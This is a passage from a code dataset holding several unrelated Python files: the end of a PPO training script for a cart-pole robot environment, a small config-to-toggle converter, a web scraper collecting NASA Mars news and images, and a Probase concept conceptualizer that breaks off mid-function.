parser.add_argument( \"--load\", type=str, default=\"\", help=\"Directory to load agent from.\")\n parser.add_argument( \"--log-interval\", type=int, default=1000,\n help=\"Interval in timesteps between outputting log messages during training\",)\n parser.add_argument( \"--eval-interval\", type=int, default=5000,\n help=\"Interval in timesteps between evaluations.\",)\n parser.add_argument( \"--checkpoint-interval\", type=int, default=5000,\n help=\"Interval in timesteps between saving checkpoint\",)\n parser.add_argument( \"--eval-n-runs\", type=int, default=10,\n help=\"Number of episodes run for each evaluation.\",\n )\n parser.add_argument('--gpu', type=int, default=0, help='gpu id (-1 for cpu)')\n args = parser.parse_args()\n cfg_name = args.cfg_name\n\n # folder config & logdir\n task_path = os.path.dirname(os.path.realpath(__file__))\n rsc_path = task_path + \"/../rsc\"\n env_path = task_path + \"/..\"\n cfg_abs_path = task_path + \"/../\" + cfg_name\n log_dir = os.path.join(task_path, 'runs/pfrl_ppo')\n\n save_items = [env_path + '/Environment.hpp',\n cfg_abs_path,\n __file__]\n cfg_saver = ConfigurationSaver(log_dir, save_items, args)\n\n # environment\n cfg = YAML().load(open(cfg_abs_path, 'r'))\n impl = cart_pole_example_env(rsc_path, dump(cfg['environment'], Dumper=RoundTripDumper))\n env = VecEnvPython(impl)\n steps_per_episode = math.floor(cfg['environment']['max_time'] / cfg['environment']['control_dt'])\n total_steps_per_iteration = steps_per_episode * cfg['environment']['num_envs']\n if total_steps_per_iteration%cfg['algorithm']['num_mini_batches'] > 0.01:\n raise Exception(\"nminibatches needs to be a multiple of total steps per iteration\")\n\n total_steps_per_minibatch = int(total_steps_per_iteration/cfg['algorithm']['num_mini_batches'])\n log_interval_steps = total_steps_per_iteration # log (print to terminal) at every algorithm iteration\n eval_interval_steps = total_steps_per_iteration * 20 # evaluate and record video, update tb,\n total_training_steps = cfg['algorithm']['total_algo_updates'] * total_steps_per_iteration\n checkpoint_save_interval_steps = eval_interval_steps\n\n print(steps_per_episode)\n print('total_steps_per_iteration: ', total_steps_per_iteration)\n print('total_steps_per_minibatch: ', total_steps_per_minibatch)\n print('log_interval_steps: ', log_interval_steps)\n print('eval_interval_steps: ', eval_interval_steps)\n print('total_training_steps: ', total_training_steps)\n 
print('checkpoint_save_interval_steps: ', checkpoint_save_interval_steps)\n\n # seeding\n seed = cfg['environment']['seed']\n torch.manual_seed(seed)\n utils.set_random_seed(seed) # Set a random seed used in PFRL\n\n # actor & critic\n policy = torch.nn.Sequential(\n nn.Linear(env.observation_space.shape[0], 32),\n nn.Tanh(),\n nn.Linear(32, 32),\n nn.Tanh(),\n nn.Linear(32, env.action_space.shape[0]),\n pfrl.policies.GaussianHeadWithStateIndependentCovariance(\n action_size=env.action_space.shape[0],\n var_type=\"diagonal\",\n var_func=lambda x: torch.exp(2 * x), # Parameterize log std\n var_param_init=0, # log std = 0 => std = 1\n ),\n )\n\n vf = torch.nn.Sequential(\n nn.Linear(env.observation_space.shape[0], 32),\n nn.Tanh(),\n nn.Linear(32, 32),\n nn.Tanh(),\n nn.Linear(32, 1),\n )\n def ortho_init(layer, gain):\n nn.init.orthogonal_(layer.weight, gain=gain)\n nn.init.zeros_(layer.bias)\n\n ortho_init(policy[0], gain=1)\n ortho_init(policy[2], gain=1)\n ortho_init(policy[4], gain=1e-2)\n ortho_init(vf[0], gain=1)\n ortho_init(vf[2], gain=1)\n ortho_init(vf[4], gain=1)\n\n model = pfrl.nn.Branched(policy, vf)\n opt = torch.optim.Adam(model.parameters(), lr=cfg['algorithm']['learning_rate'], eps=1e-5)\n\n agent = pfrl.agents.PPO(\n model,\n opt,\n obs_normalizer=None,\n gpu=args.gpu,\n value_func_coef=cfg['algorithm']['vf_coef'],\n update_interval=total_steps_per_iteration,\n minibatch_size=total_steps_per_minibatch,\n epochs=cfg['algorithm']['num_epochs'],\n clip_eps_vf=None,\n entropy_coef=cfg['algorithm']['ent_coef'],\n standardize_advantages=True,\n gamma=cfg['algorithm']['discount_factor'],\n lambd=cfg['algorithm']['gae_lam']\n )\n\n # logger settings\n logging.basicConfig(level=logging.INFO, stream=sys.stdout, format='')\n logger = logging.getLogger(__name__)\n\n if len(args.load) > 0:\n agent.load(args.load)\n\n if args.demo:\n if cfg['environment']['render']:\n env.show_window()\n if args.demo_record:\n env.start_recording_video(args.load + \"/../demo_\" + os.path.basename(args.load) + \".mp4\")\n eval_stats = eval_performance_pfrl(\n env=env,\n agent=agent,\n n_steps=None,\n n_episodes=args.eval_n_runs,\n max_episode_len=steps_per_episode,\n visualize=cfg['environment']['render'],\n )\n if cfg['environment']['render']:\n if args.demo_record:\n env.stop_recording_video()\n env.hide_window()\n print(\n \"n_runs: {} mean: {} median: {} stdev {}\".format(\n args.eval_n_runs,\n eval_stats[\"mean\"],\n eval_stats[\"median\"],\n eval_stats[\"stdev\"],\n )\n )\n else:\n train_agent_batch_with_evaluation_pfrl(\n agent=agent,\n env=env,\n outdir=cfg_saver.data_dir,\n steps=total_training_steps,\n eval_n_steps=steps_per_episode,\n eval_n_episodes=None, # eval_n_steps or eval_n_episodes, one of them must be none!\n eval_interval=eval_interval_steps, # in timesteps\n log_interval=log_interval_steps, # in timesteps\n max_episode_len=steps_per_episode,\n visualize=cfg['environment']['render'],\n use_tensorboard=True,\n checkpoint_freq=checkpoint_save_interval_steps,\n logger=logger\n )\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"leggedrobotics/RSLGym","sub_path":"examples/envs/cart_pole/scripts/pfrl_ppo_train.py","file_name":"pfrl_ppo_train.py","file_ext":"py","file_size_in_byte":7288,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"61"}
+{"seq_id":"30989000711","text":"f = open(\"configEntries.txt\", \"r\")\nraw = f.read()\n\nli = raw.split(\"\\n\")\n\nnewToggles = []\n\nfor string in li:\n if string.find(\"//\") != -1 or string == \"\":\n continue\n\n stringElements = string.split(\" \")\n\n configName = \"toggles.Add(\" + stringElements[3][:-1] + \");\"\n newToggles.append(configName)\n\n\nfor string in newToggles:\n print(string)\n\n \n","repo_name":"SylmarDev/SpireItems","sub_path":"togglesAdd.py","file_name":"togglesAdd.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23644095463","text":"# --------------------------------------------------------------------------------------------------------------------------------\n# Imports and Executables \n# --------------------------------------------------------------------------------------------------------------------------------\nfrom splinter import Browser\n\nfrom bs4 import BeautifulSoup as soupy\n\nimport pandas as pd\n\nimport datetime as dt\n\n\n\n\n# --------------------------------------------------------------------------------------------------------------------------------\n# Gathered Data \n# --------------------------------------------------------------------------------------------------------------------------------\n\ndef scrape_all():\n\n # Set the executable path and initialize the chrome browser in splinter\n browser = Browser('chrome', **{'executable_path':'chromedriver'}, headless=True)\n # headless = True, doesnt show automated script in action\n \n # pylint: disable=unbalanced-tuple-unpacking\n # news_title, news_teaser_sum, news_date = mars_news(browser)\n news_title, news_teaser_sum = mars_news(browser) \n\n # Runs all separate scraping functions and stores results in a dictionary\n mars_total_data = {\n \"news_title\" : news_title,\n \"news_paragraph_summary\" : news_teaser_sum,\n # \"news_latest_date\" : news_date,\n # \"news_latest_link\" : latest_art_link,\n \"featured_image\" : featured_image(browser),\n \"facts\" : mars_facts(),\n \"img_and_url\": get_url(browser),\n \"last_modified\" : dt.datetime.now()}\n\n browser.quit()\n\n return mars_total_data\n\n\n# --------------------------------------------------------------------------------------------------------------------------------\n# News Title and Paragraph\n# --------------------------------------------------------------------------------------------------------------------------------\n\ndef mars_news(browser):\n# defined outside of the function, basically a catalyst to get the function started, like a grandfather variable\n# browser function already defined outside \n\n # Visit the mars nasa news site\n nasa_url = 'https://mars.nasa.gov/news/'\n\n browser.visit(nasa_url)\n\n # optional delay for loading page\n browser.is_element_present_by_css(\"ul.item_list li.slide\", wait_time=1)\n\n # Convert the browser html to a soup object and then quit the browser\n parse_html = browser.html\n\n news_soup = soupy(parse_html, 'html.parser')\n\n \n try:\n # add error handling, espescially for AttributeErros with try/except\n # if error, code will keep running, except it will stop when its AttributeError with none returned\n \n slide_elem = news_soup.select_one('ul.item_list li.slide') # parent element, holds other elements to furthur filter\n\n # Use the parent element to find the first a tag and save it as `news_title`\n news_title = slide_elem.find('div',class_='content_title').get_text()\n\n # news_date = slide_elem.find('div',class_='list_date').get_text()\n\n # latest_art_link = f\"https://mars.nasa.gov{slide_elem.select_one('ul li a').get('href')}\"\n\n # Use the parent element to find the paragraph text\n news_teaser_sum = slide_elem.find('div',class_='article_teaser_body').get_text()\n\n except AttributeError:\n\n return None, None\n\n # return news_title, news_teaser_sum, news_date, latest_art_link\n\n return news_title, news_teaser_sum\n\n# --------------------------------------------------------------------------------------------------------------------------------\n# JPL Featured Space Image\n# 
--------------------------------------------------------------------------------------------------------------------------------\n\n# Visit URL\ndef featured_image(browser):\n\n url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n\n browser.visit(url)\n\n # Find and click the full image button\n full_image_elem = browser.find_by_id('full_image')\n\n full_image_elem.click()\n\n # Find the more info button and click that\n browser.is_element_present_by_text('more info', wait_time=1)\n\n more_info_elem = browser.links.find_by_partial_text('more info')\n\n more_info_elem.click()\n\n # Parse the resulting html with soup\n parse_html = browser.html\n\n full_img_soup = soupy(parse_html, 'html.parser' )\n\n try:\n\n # find the relative image url\n latest_image_full = full_img_soup.select_one('figure.lede a img').get(\"src\")\n\n except AttributeError:\n\n return None\n\n # Use the base url to create an absolute url\n latest_imgurl = f\"https://www.jpl.nasa.gov{latest_image_full}\"\n\n return latest_imgurl \n\n# --------------------------------------------------------------------------------------------------------------------------------\n# Mars Fact Table\n# --------------------------------------------------------------------------------------------------------------------------------\n\ndef mars_facts():\n\n try:\n \n mars_df = pd.read_html('https://space-facts.com/mars/')[0]\n\n except BaseException:\n # covers all exception errors \n\n return None\n\n # Assign columns and set index of dataframe\n mars_df.columns = ['Description', 'Mars'] # adds column names\n\n mars_df.set_index('Description', inplace=True) # set column index\n\n # Convert dataframe into HTML format, add bootstrap\n return mars_df.to_html(classes= \"table\")\n\n\n\n# --------------------------------------------------------------------------------------------------------------------------------\n# Mars Hemispheres\n# --------------------------------------------------------------------------------------------------------------------------------\n\ndef get_url(browser):\n\n hemis_search_list = ['Cerberus Hemisphere Enhanced',\n 'Schiaparelli Hemisphere Enhanced',\n 'Syrtis Major Hemisphere Enhanced',\n 'Valles Marineris Hemisphere Enhanced']\n\n names_n_url = []\n\n Hemisphere = \"Hemisphere\"\n\n Urlid = \"URL\"\n\n for x in range(len(hemis_search_list)):\n \n url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n\n browser.visit(url)\n \n try:\n\n browser.is_element_present_by_text((f'{hemis_search_list[x]}'), wait_time=2)\n \n hemi_click = browser.links.find_by_partial_text(f'{hemis_search_list[x]}')\n \n hemi_click.click()\n \n parse_html = browser.html\n\n hemi_parse_html = soupy(parse_html, 'html.parser' )\n \n hemi_img_url = hemi_parse_html.select_one('ul li a').get(\"href\")\n \n names_n_url.append({Hemisphere:hemis_search_list[x],Urlid:hemi_img_url})\n\n except IndexError:\n\n return f\"Search result not found\"\n\n except AttributeError:\n\n return None\n\n # df_hemi_urls = pd.DataFrame.from_dict(names_n_url, orient='columns')\n\n # df_hemi_urls.set_index('Hemisphere', inplace=True)\n \n # df_hemi_urls['URL']=str(df_hemi_urls['URL']) \n\n # pd.set_option('display.max_colwidth', -1)\n\n return names_n_url\n\n\n\nif __name__ == \"__main__\":\n\n # if running as script, print scraped data\n\n 
print(scrape_all())","repo_name":"SiMewL8/Mission-To-Mars","sub_path":"Mars_Scraping/scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":7455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"2193274261","text":"import argparse\nimport json\nimport time\nimport pickle\nimport heapq\nimport os\nfrom tqdm import tqdm\nfrom collections import defaultdict, Counter\nfrom copy import copy, deepcopy\nfrom itertools import combinations, chain\nfrom object import *\nfrom utils import *\n\n\nclass ProbaseConcept(object):\n \"\"\" Copied from https://github.com/ScarletPan/probase-concept\n \"\"\"\n def __init__(self, data_concept_path=\"\"):\n \"\"\"\n :param data_concept_path: Probase .txt file path\n :type data_concept_path: str\n \"\"\"\n self.concept2idx = dict()\n self.idx2concept = dict()\n self.concept_inverted_list = dict()\n self.instance2idx = dict()\n self.idx2instance = dict()\n self.instance_inverted_list = dict()\n if data_concept_path:\n self._load_raw_data(data_concept_path)\n\n def _load_raw_data(self, data_concept_path):\n st = time.time()\n print(\"[probase-conceptualize] Loading Probase files...\")\n with open(data_concept_path) as f:\n triplet_lines = [line.strip() for line in f]\n\n print(\"[probase-conceptualize] Building index...\")\n for line in tqdm(triplet_lines):\n concept, instance, freq = line.split('\\t')\n if concept not in self.concept2idx:\n self.concept2idx[concept] = len(self.concept2idx)\n concept_idx = self.concept2idx[concept]\n if instance not in self.instance2idx:\n self.instance2idx[instance] = len(self.instance2idx)\n instance_idx = self.instance2idx[instance]\n if concept_idx not in self.concept_inverted_list:\n self.concept_inverted_list[concept_idx] = list()\n self.concept_inverted_list[concept_idx].append((instance_idx, int(freq)))\n if instance_idx not in self.instance_inverted_list:\n self.instance_inverted_list[instance_idx] = list()\n self.instance_inverted_list[instance_idx].append((concept_idx, int(freq)))\n\n self.idx2concept = {val: key for key, val in self.concept2idx.items()}\n self.idx2instance = {val: key for key, val in self.instance2idx.items()}\n print(\"[probase-conceptualize] Loading data finished in {:.2f} s\".format(time.time() - st))\n\n def conceptualize(self, instance, score_method=\"likelihood\"):\n \"\"\" Conceptualize the given instance\n :param instance: the given instance\n :type instance: str\n :param score_method: the method to compute sscores (\"likelihood\" or \"pmi\")\n :type score_method: str\n :return: a list of (concept, score)\n :rtype: List[Tuple[ProbaseConcept, float]]\n \"\"\"\n\n if instance not in self.instance2idx:\n return []\n instance_idx = self.instance2idx[instance]\n instance_freq = self.get_instance_freq(instance_idx)\n concept_list = self.instance_inverted_list[instance_idx]\n rst_list = list()\n for concept_idx, co_occurrence in concept_list:\n if score_method == \"pmi\":\n score = co_occurrence / self.get_concept_freq(concept_idx) / instance_freq\n elif score_method == \"likelihood\":\n score = co_occurrence / instance_freq\n else:\n raise NotImplementedError\n rst_list.append((self.idx2concept[concept_idx], score))\n rst_list.sort(key=lambda x: x[1], reverse=True)\n return rst_list\n\n def instantiate(self, concept):\n \"\"\" Retrieve all instances of a concept\n :param concept: the given concept\n :type concept: str\n :return: a list of instances\n :rtype: List[Tuple[str, float]]\n \"\"\"\n\n if concept not in self.concept2idx:\n return []\n concept_idx = self.concept2idx[concept]\n rst_list = [(self.idx2instance[idx], freq) for idx, freq in self.concept_inverted_list[concept_idx]]\n rst_list.sort(key=lambda x: x[1], reverse=True)\n return rst_list\n\n def 
get_concept_chain(self, instance, max_chain_length=5):\n \"\"\" Conceptualize the given instance in a chain\n :param instance: the given instance\n :type instance: str\n :param max_chain_length: the maximum length of the chain\n :type max_chain_length: int (default = 5)\n :return: a chain that contains concepts\n :rtype: List[str]\n \"\"\"\n\n if instance in self.concept2idx:\n chain = [instance]\n else:\n chain = list()\n tmp_instance = instance\n while True:\n concepts = self.conceptualize(tmp_instance, score_method=\"likelihood\")\n if concepts:\n chain.append(concepts[0][0])\n else:\n break\n if len(chain) >= max_chain_length:\n break\n tmp_instance = chain[-1]\n if chain and chain[0] != instance:\n return [instance] + chain\n else:\n return chain\n\n def get_concept_freq(self, concept):\n \"\"\" Get the frequency of a concept\n :param concept: the given concept\n :type concept: str\n :return: the corresponding frequency\n :rtype: float\n \"\"\"\n\n if isinstance(concept, str):\n if concept not in self.concept2idx:\n return 0\n concept = self.concept2idx[concept]\n elif isinstance(concept, int):\n if concept not in self.idx2concept:\n return 0\n return sum([t[1] for t in self.concept_inverted_list[concept]])\n\n def get_instance_freq(self, instance):\n \"\"\" Get the frequency of an instance\n :param instance: the given instance\n :type instance: str\n :return: the corresponding frequency\n :rtype: float\n \"\"\"\n\n if isinstance(instance, str):\n if instance not in self.instance2idx:\n return 0\n instance = self.instance2idx[instance]\n elif isinstance(instance, int):\n if instance not in self.idx2instance:\n return 0\n return sum([t[1] for t in self.instance_inverted_list[instance]])\n\n def save(self, file_name):\n \"\"\"\n :param file_name: the file name to save the probase concepts\n :type file_name: str\n \"\"\"\n\n with open(file_name, \"wb\") as f:\n pickle.dump(self.__dict__, f)\n\n def load(self, file_name):\n \"\"\"\n :param file_name: the file name to load the probase concepts\n :type file_name: str\n \"\"\"\n\n with open(file_name, \"rb\") as f:\n tmp_dict = pickle.load(f)\n for key, val in tmp_dict.items():\n self.__setattr__(key, val)\n\n @property\n def concept_size(self):\n return len(self.concept2idx)\n\n @property\n def instance_size(self):\n return len(self.instance2idx)\n\n\nclass BaseConceptualizer(object):\n \"\"\" Base ASER eventuality conceptualizer to conceptualize eventualities\n \"\"\"\n def __init__(self):\n pass\n\n def close(self):\n \"\"\" Close the ASER Conceptualizer safely\n \"\"\"\n pass\n\n def conceptualize(self, eventuality):\n \"\"\" Conceptualize an eventuality\n :param eventuality: an eventuality\n :type eventuality: Eventuality\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n raise NotImplementedError\n\n def conceptualize_from_text(self, words, ners=None):\n \"\"\" Conceptualize an eventuality\n :param words: a word list\n :type words: List[str]\n :param ners: a ner list\n :type ners: List[str]\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n raise NotImplementedError\n\n\nclass SeedRuleConceptualizer(BaseConceptualizer):\n \"\"\" eventuality conceptualizer based on rules and NERs\n \"\"\"\n def __init__(self, **kw):\n super().__init__()\n self.selected_ners = frozenset(\n [\n \"TIME\", \"DATE\", \"DURATION\", \"MONEY\", \"PERCENT\", \"NUMBER\", \"COUNTRY\", \"STATE_OR_PROVINCE\", \"CITY\",\n 
\"NATIONALITY\", \"PERSON\", \"RELIGION\", \"URL\"\n ]\n )\n self.seed_concepts = frozenset([self._render_ner(ner) for ner in self.selected_ners])\n\n self.person_pronoun_set = frozenset(\n [\"he\", \"she\", \"i\", \"him\", \"her\", \"me\", \"woman\", \"man\", \"boy\", \"girl\", \"you\", \"we\", \"they\"]\n )\n self.pronouns = self.person_pronoun_set | frozenset(['it'])\n\n def conceptualize(self, eventuality):\n \"\"\" Conceptualization based on rules and NERs given an eventuality\n :param eventuality: an eventuality\n :type eventuality: Eventuality\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n concept_strs = self.conceptualize_from_text(eventuality.phrases, eventuality.phrases_ners)\n return [(\" \".join(concept_strs), 1.0)]\n\n def conceptualize_from_text(self, words, ners):\n \"\"\" Conceptualization based on rules and NERs given a word list an a ner list\n :param words: a word list\n :type words: List[str]\n :param ners: a ner list\n :type ners: List[str]\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n output_words = list()\n ners_dict = {ner: dict() for ner in self.selected_ners}\n for word, ner in zip(words, ners):\n if ner in self.selected_ners:\n if word not in ners_dict[ner]:\n ners_dict[ner][word] = len(ners_dict[ner])\n output_words.append(self._render_ner(ner) + \"%d\" % ners_dict[ner][word])\n elif word in self.person_pronoun_set:\n if word not in ners_dict[\"PERSON\"]:\n ners_dict[\"PERSON\"][word] = len(ners_dict[\"PERSON\"])\n output_words.append(self._render_ner(\"PERSON\") + \"%d\" % ners_dict[\"PERSON\"][word])\n else:\n output_words.append(word)\n return output_words\n\n def is_seed_concept(self, word):\n return word in self.seed_concepts\n\n def is_pronoun(self, word):\n return word in self.pronouns\n\n def _render_ner(self, ner):\n return \"__\" + ner + \"__\"\n\n\nclass ProbaseConceptualizer(BaseConceptualizer):\n \"\"\" eventuality conceptualizer based on Probase and NERs\n \"\"\"\n def __init__(self, probase_path=None, topK=None):\n super().__init__()\n self.seed_conceptualizer = SeedRuleConceptualizer()\n self.probase = ProbaseConcept(probase_path)\n self.topK = topK\n\n def close(self):\n \"\"\" Close the ASER Conceptualizer safely\n \"\"\"\n del self.probase\n self.probase = None\n\n def conceptualize(self, eventuality, start_index=0):\n \"\"\" Conceptualization use probase given an eventuality\n :param eventuality: an eventuality\n :type eventuality: Eventuality\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n if not isinstance(eventuality, Eventuality):\n eventuality = Eventuality().from_dict(eventuality)\n\n # word conceptualization\n if start_index == 0:\n concept_after_seed_rule = self.seed_conceptualizer.conceptualize_from_text(\n eventuality.words, eventuality.ners\n )\n concept_strs = self._get_probase_concepts(concept_after_seed_rule, eventuality.pos_tags)\n else:\n concept_after_seed_rule = self.seed_conceptualizer.conceptualize_from_text(\n [\"UNK\"] * start_index + eventuality.words[start_index:],\n [\"O\"] * start_index + eventuality.ners[start_index:]\n )\n concept_after_seed_rule = concept_after_seed_rule.__class__(eventuality.words[:start_index]\n ) + concept_after_seed_rule[start_index:]\n concept_strs = self._get_probase_concepts(\n concept_after_seed_rule, [\"FW\"] * start_index + eventuality.pos_tags[start_index:]\n )\n\n if 
len(eventuality.phrases) != len(eventuality.words):\n concept_strs1 = concept_strs if concept_strs else []\n for idx, indices in enumerate(eventuality._phrase_segment_indices):\n if start_index in indices:\n start_index = idx\n break\n if start_index == 0:\n concept_after_seed_rule2 = self.seed_conceptualizer.conceptualize_from_text(\n eventuality.phrases, eventuality.phrases_ners\n )\n concept_strs2 = self._get_probase_concepts(concept_after_seed_rule2, eventuality.pos_tags)\n else:\n concept_after_seed_rule2 = self.seed_conceptualizer.conceptualize_from_text(\n [\"UNK\"] * start_index + eventuality.phrases[start_index:],\n [\"O\"] * start_index + eventuality.phrases_ners[start_index:]\n )\n concept_after_seed_rule2 = concept_after_seed_rule2.__class__(eventuality.phrases[:start_index]\n ) + concept_after_seed_rule2[start_index:]\n concept_strs2 = self._get_probase_concepts(\n concept_after_seed_rule2, [\"FW\"] * start_index + eventuality.pos_tags[start_index:]\n )\n\n max_len = self.topK**self.topK\n used_concepts = set()\n concept_strs = []\n ptr1, ptr2, l1, l2 = 0, 0, len(concept_strs1), len(concept_strs2)\n while ptr1 < l1 and ptr2 < l2 and len(used_concepts) < max_len:\n if concept_strs1[ptr1][1] > concept_strs2[ptr2][1]:\n concept_str = \" \".join(concept_strs1[ptr1][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs1[ptr1])\n ptr1 += 1\n else:\n concept_str = \" \".join(concept_strs2[ptr2][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs2[ptr2])\n ptr2 += 1\n while ptr1 < l1 and len(used_concepts) < max_len:\n concept_str = \" \".join(concept_strs1[ptr1][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs1[ptr1])\n ptr1 += 1\n while ptr2 < l2 and len(used_concepts) < max_len:\n concept_str = \" \".join(concept_strs2[ptr2][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs2[ptr2])\n ptr2 += 1\n\n if not concept_strs and concept_after_seed_rule != \" \".join(eventuality.words):\n concept_strs = [(concept_after_seed_rule, 1.0)]\n\n concept_score_pairs = [\n (ASERConcept(words=concept_str, instances=list()), score) for concept_str, score in concept_strs\n ]\n return concept_score_pairs\n\n def conceptualize_from_text(self, words, ners, pos_tags, dependencies, start_index=0):\n \"\"\" Conceptualization use probase given an eventuality\n :param words: a word list\n :type words: List[str]\n :param ners: a ner list\n :type ners: List[str]\n :param dependencies: the input dependencies\n :type dependencies: List[Tuple[int, str, int]]\n :return: a list of (conceptualized eventuality, score) pair\n :rtype: List[Tuple[ASERConcept, float]]\n \"\"\"\n\n # word conceptualization\n if start_index == 0:\n concept_after_seed_rule = self.seed_conceptualizer.conceptualize_from_text(words, ners)\n concept_strs = self._get_probase_concepts(concept_after_seed_rule, pos_tags)\n else:\n concept_after_seed_rule = self.seed_conceptualizer.conceptualize_from_text(\n [\"UNK\"] * start_index + words[start_index:], [\"O\"] * start_index + ners[start_index:]\n )\n concept_after_seed_rule = concept_after_seed_rule.__class__(words[:start_index]\n ) + concept_after_seed_rule[start_index:]\n concept_strs = self._get_probase_concepts(\n concept_after_seed_rule, [\"FW\"] * start_index + pos_tags[start_index:]\n )\n\n # phrase conceptualization\n phrase_segment_indices = 
self._dep_compound_segment(words, dependencies)\n phrase_words = list()\n phrase_ners = list()\n phrase_pos_tags = list()\n for _range in phrase_segment_indices:\n st = min(_range)\n end = max(_range) + 1\n if start_index in _range:\n start_index = len(phrase_words)\n phrase_words.append(\" \".join(words[st:end]))\n\n if isinstance(ners[_range[0]], str):\n ner = ners[_range[0]]\n else:\n for x in ners[_range[0]].most_common():\n if x[0] != \"O\":\n ner = x[0]\n break\n phrase_ners.append(ner)\n phrase_pos_tags.append(pos_tags[_range[0]])\n\n if len(phrase_words) != len(words):\n concept_strs1 = concept_strs if concept_strs else []\n\n if start_index == 0:\n concept_after_seed_rule2 = self.seed_conceptualizer.conceptualize_from_text(phrase_words, phrase_ners)\n concept_strs2 = self._get_probase_concepts(concept_after_seed_rule2, phrase_pos_tags)\n else:\n concept_after_seed_rule2 = self.seed_conceptualizer.conceptualize_from_text(\n [\"UNK\"] * start_index + phrase_words[start_index:], [\"O\"] * start_index + phrase_ners[start_index:]\n )\n concept_after_seed_rule2 = concept_after_seed_rule2.__class__(phrase_words[:start_index]\n ) + concept_after_seed_rule2[start_index:]\n concept_strs2 = self._get_probase_concepts(\n concept_after_seed_rule2, [\"FW\"] * start_index + phrase_pos_tags[start_index:]\n )\n\n max_len = self.topK**self.topK\n used_concepts = set()\n concept_strs = []\n ptr1, ptr2, l1, l2 = 0, 0, len(concept_strs1), len(concept_strs2)\n while ptr1 < l1 and ptr2 < l2 and len(used_concepts) < max_len:\n if concept_strs1[ptr1][1] > concept_strs2[ptr2][1]:\n concept_str = \" \".join(concept_strs1[ptr1][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs1[ptr1])\n ptr1 += 1\n else:\n concept_str = \" \".join(concept_strs2[ptr2][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs2[ptr2])\n ptr2 += 1\n while ptr1 < l1 and len(used_concepts) < max_len:\n concept_str = \" \".join(concept_strs1[ptr1][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs1[ptr1])\n ptr1 += 1\n while ptr2 < l2 and len(used_concepts) < max_len:\n concept_str = \" \".join(concept_strs2[ptr2][0])\n if concept_str not in used_concepts:\n used_concepts.add(concept_str)\n concept_strs.append(concept_strs2[ptr2])\n ptr2 += 1\n\n if not concept_strs and concept_after_seed_rule != \" \".join(words):\n concept_strs = [(concept_after_seed_rule, 1.0)]\n\n concept_score_pairs = [\n (ASERConcept(words=concept_str, instances=list()), score) for concept_str, score in concept_strs\n ]\n return concept_score_pairs\n\n def _get_probase_concepts(self, words, pos_tags):\n word2indices = defaultdict(list)\n for idx, word in enumerate(words):\n word2indices[word].append(idx)\n\n word2concepts = dict()\n for i in range(len(pos_tags)):\n if i >= len(words):\n break\n word = words[i]\n tag = pos_tags[i]\n\n if tag.startswith(\"NN\") and (len(word) > 0 and word[0].islower()):\n if self.seed_conceptualizer.is_seed_concept(word) or self.seed_conceptualizer.is_pronoun(word):\n continue\n elif word not in word2concepts:\n concepts = self.probase.conceptualize(word, score_method=\"likelihood\")\n if concepts:\n concept_set = set()\n valid_indices = list()\n for idx, (tmp_concept, score) in enumerate(concepts):\n tmp = tmp_concept.replace(\" \", \"-\")\n if tmp not in concept_set:\n valid_indices.append(idx)\n concept_set.add(tmp)\n if len(valid_indices) >= 
self.topK:\n break\n word2concepts[word] = \\\n [(concepts[idx][0].replace(\" \", \"-\"), concepts[idx][1]) for idx in valid_indices]\n else:\n continue\n\n matched_words = list(word2concepts.keys())\n replace_word_tuples = list()\n for i in range(1, len(word2concepts) + 1):\n replace_word_tuples.extend(list(combinations(matched_words, i)))\n\n output_words_heap = list()\n max_len = self.topK**self.topK\n pre_min_score = 1.0\n min_score = -1.0\n pre_comb_len = 0\n comb_len = 1\n for word_tuples in replace_word_tuples:\n tmp_words_list = [(1.0, words)]\n for word in word_tuples:\n new_tmp_words_list = list()\n # can be further optimized...\n for prob, tmp_words in tmp_words_list:\n for concept, c_prob in word2concepts[word]:\n _tmp_words = tmp_words[:]\n for idx in word2indices[word]:\n _tmp_words[idx] = concept\n new_tmp_words_list.append((prob * c_prob, _tmp_words))\n del tmp_words_list\n tmp_words_list = new_tmp_words_list\n\n for tmp in tmp_words_list:\n if len(output_words_heap) >= max_len:\n tmp = heapq.heappushpop(output_words_heap, tmp)\n else:\n heapq.heappush(output_words_heap, tmp)\n if min_score < tmp[0]:\n min_score = tmp[0]\n comb_len = len(word_tuples)\n if pre_min_score == min_score and pre_comb_len + 1 < comb_len and len(output_words_heap) >= max_len:\n break\n if pre_min_score != min_score:\n pre_min_score = min_score\n pre_comb_len = comb_len\n\n output_words_list = [heapq.heappop(output_words_heap)[::-1] for i in range(len(output_words_heap))][::-1]\n return output_words_list\n\n def _dep_compound_segment(self, words, dependencies):\n tmp_compound_tuples = list()\n for governor_idx, dep, dependent_idx in dependencies:\n if dep.startswith(\"compound\"):\n tmp_compound_tuples.append((governor_idx, dependent_idx))\n\n tmp_compound_tuples = sorted(tmp_compound_tuples)\n compound_tuples = list()\n used_indices = set()\n for i in 